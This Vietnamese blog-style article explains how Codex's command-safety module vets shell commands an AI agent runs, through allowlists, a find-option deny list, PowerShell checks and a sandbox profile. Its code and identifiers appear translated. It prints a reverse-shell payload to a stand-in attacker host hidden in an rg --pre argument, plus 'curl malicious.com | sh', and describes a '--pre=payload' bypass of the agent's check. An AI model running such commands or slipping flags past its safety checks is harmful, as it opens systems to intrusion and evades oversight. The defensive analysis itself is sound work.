Bạn có lo ngại về các rủi ro an ninh khi trợ lý AI thực thi lệnh? Khi các công cụ phát triển như Codex tự động chạy các lệnh nguy hiểm như rm -rf / hoặc curl malicious.com | sh, hậu quả có thể rất nghiêm trọng. Bài viết này sẽ phân tích chi tiết mô-đun kiểm tra an toàn lệnh cốt lõi của Codex – kiểm_tra_lenh_an_toan, thông qua 10 ví dụ thực tế và cơ chế bảo vệ ba tầng, giúp bạn hiểu rõ hơn về ranh giới an toàn trong việc thực thi lệnh bởi AI.

Ví Dụ Nguy Cơ: Lệnh "An Toàn" Bị Bỏ Qua

Vào năm 2024, một đội ngũ phát triển tại một công ty công nghệ đã gặp phải trường hợp thực tế: Codex nhầm lẫn đánh giá lệnh rg chứa tham số --pre là an toàn, dẫn đến việc mã độc được thực thi thông qua bộ tiền xử lý. Điều này bộc lộ hạn chế của phiên bản đầu tiên của mô-đun kiểm_tra_lenh_an_toan trong việc phân tích các tham số phức tạp.

// Ví dụ nguy cơ: Lệnh bị đánh giá sai là an toàn
rg --pre 'bash -i >& /dev/tcp/tancong.com/4444 0>&1' matkhau.txt

Trong tệp mã nguồn codex_rs/core/src/command_safety/kiem_tra_lenh_an_toan.rs, ban đầu chỉ kiểm tra xem tham số có khớp trực tiếp với --pre hay không, mà bỏ qua dạng biến đổi như --pre=payload. Điều này cho phép kẻ tấn công tạo ra các tham số đặc biệt để vượt qua kiểm tra.

Cơ Chế Phòng Ngừa Cốt Lõi: Ba Lớp Lọc Trong kiem_tra_lenh_an_toan

1. Cơ Chế Danh Sách Cho Phép Mặc Định

Mô-đun sử dụng nguyên tắc từ chối mặc định, chỉ cho phép các lệnh và các lệnh con an toàn nằm trong danh sách trắng. Ví dụ, đối với lệnh git:

// [codex_rs/core/src/command_safety/kiem_tra_lenh_an_toan.rs]
Some("git") => matches!(
    command.get(1).map(String::as_str),
    Some("branch" | "status" | "log" | "diff" | "show")
),

Chỉ cho phép các lệnh đọc như git status, git log, từ chối các lệnh ghi như git push, git merge.

2. Kiểm Tra Độ Sâu Các Tham Số

Với các lệnh hỗ trợ, mô-đun tiến hành kiểm tra an toàn ở mức độ tham số. Ví dụ, lệnh find cấm các tùy chọn nguy hiểm như -exec, -delete:

// [codex_rs/core/src/command_safety/kiem_tra_lenh_an_toan.rs]
const NGUY_HIEM_FIND_OPTIONS: &[&str] = &[
    // Tùy chọn thực thi bất kỳ lệnh nào
    "-exec", "-execdir", "-ok", "-okdir",
    // Tùy chọn xóa tập tin
    "-delete",
    // Tùy chọn ghi vào tập tin
    "-fls", "-fprint", "-fprint0", "-fprintf",
];

3. Logic Điều Chỉnh Theo Nền Tảng

Đối với hệ điều hành Windows, mô-đun triển khai riêng hàm kiem_tra_lenh_an_toan_windows để xử lý kiểm tra an toàn cho lệnh PowerShell:

// [codex_rs/core/src/command_safety/windows_safe_commands.rs]
pub fn kiem_tra_lenh_an_toan_windows(command: &[String]) -> bool {
    if let Some(commands) = try_parse_powershell_command_sequence(command) {
        return commands
            .iter()
            .all(|cmd| is_safe_powershell_command(cmd.as_slice()));
    }
    false
}

Hàm này sẽ phân tích chuỗi lệnh PowerShell, ngăn chặn các lệnh chứa hoạt động nguy hiểm như echo hi > out.txt.

Sử Dụng Chính Sách Sandboxing Để Tăng Cường Bảo Mật

Kể cả sau khi vượt qua kiểm tra kiem_tra_lenh_an_toan, các hoạt động quan trọng vẫn được thực hiện trong sandbox seatbelt với chính sách tối thiểu quyền hạn:

; Từ chối tất cả hoạt động mặc định
(deny default)

; Chỉ cho phép các cuộc gọi hệ thống cần thiết
(allow sysctl-read
  (sysctl-name "hw.ncpu")
  (sysctl-name "kern.hostname")
  (sysctl-name "vm.loadavg")
)

Tại codex_rs/core/src/seatbelt.rs, sandbox sẽ điều chỉnh quyền hạn theo loại lệnh, ví dụ, tạm thời mở quyền đọc thư mục ~/.cargo cho lệnh cargo check.

Thiết Lập An Toàn Cơ Bản Và Tuỳ Chỉnh

Bạn có thể điều chỉnh mức độ nghiêm ngặt của kiểm tra thông qua thay đổi tham số trong tệp cấu hình:

[command_safety]
# Mức độ an toàn: strict/moderate/relaxed
level = "strict"
# Danh sách lệnh bổ sung cho phép
allowed_commands = ["tree", "fd"]
# Mức độ ghi nhật ký
log_level = "warn"

Ngoài ra, người dùng doanh nghiệp có thể thêm quy tắc tùy chỉnh tại ~/.codex/safety_rules.toml để mở rộng khả năng phát hiện.

Kết Quả Kiểm Tra 10 Lệnh Thông Thường